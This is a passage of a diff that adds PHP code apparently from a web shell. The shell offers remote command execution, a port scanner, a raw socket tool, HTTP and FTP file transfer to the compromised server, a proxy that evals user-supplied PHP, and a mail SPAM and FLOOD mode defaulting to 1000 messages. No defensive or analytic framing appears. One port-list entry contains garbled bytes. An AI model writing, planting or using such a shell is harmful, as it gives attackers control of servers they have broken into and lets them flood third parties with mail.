+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{
		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';
+	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{
		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{
		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{
			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{
				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{
			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{
				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{
	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))
		{
		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);
		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{
		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{
	if (!isset($_GET['dxparam']))
+		{
+		print '';
		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{
		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else
		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
